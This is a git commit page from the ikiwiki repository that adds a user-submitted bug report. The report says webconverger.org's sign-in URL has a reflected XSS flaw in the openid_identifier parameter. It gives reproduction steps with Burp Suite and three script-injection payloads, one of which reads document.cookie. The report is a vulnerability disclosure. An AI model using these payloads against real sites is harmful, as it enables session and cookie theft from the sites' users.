aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorhttps://www.google.com/accounts/o8/id?id=AItOawkl0wS6X0mzN8lb-SFh3ajLB-7ezwfwyTw <Raghav@web>2015-03-24 01:51:44 -0400
committeradmin <admin@branchable.com>2015-03-24 01:51:44 -0400
commited200f20391ca9553b0e722f7938aeb2870e2e33 (patch)
treef1abd242635d2edc72cb582119c0d6dc0fc031f3
parented9228e0b801daedb1a9b1255ac6804a7ffef68a (diff)
downloadikiwiki-ed200f20391ca9553b0e722f7938aeb2870e2e33.tar
ikiwiki-ed200f20391ca9553b0e722f7938aeb2870e2e33.tar.gz
-rw-r--r--doc/bugs/XSS_Alert...__33____33____33__.html25
1 files changed, 25 insertions, 0 deletions
diff --git a/doc/bugs/XSS_Alert...__33____33____33__.html b/doc/bugs/XSS_Alert...__33____33____33__.html
new file mode 100644
index 000000000..24a1a3af0
--- /dev/null
+++ b/doc/bugs/XSS_Alert...__33____33____33__.html
@@ -0,0 +1,25 @@
+Respected Sir,
+Your website "webconverger.org" is vulnerable to XSS Attack.
+
+Vulnerable Links:
+webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
+
+How To Reproduce The Vulnerability :
+1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
+2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
+3. forward the request
+
+XSS Payload :
+1. "></script><script>prompt(909043)</script>
+2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
+3. "></script><script>prompt(document.cookie)</script>
+
+NOTE : Proof of concept is attached.
+
+
+Thank You...!!
+
+
+Your Faithfully,
+Raghav Bisht
+raghav007bisht@gmail.com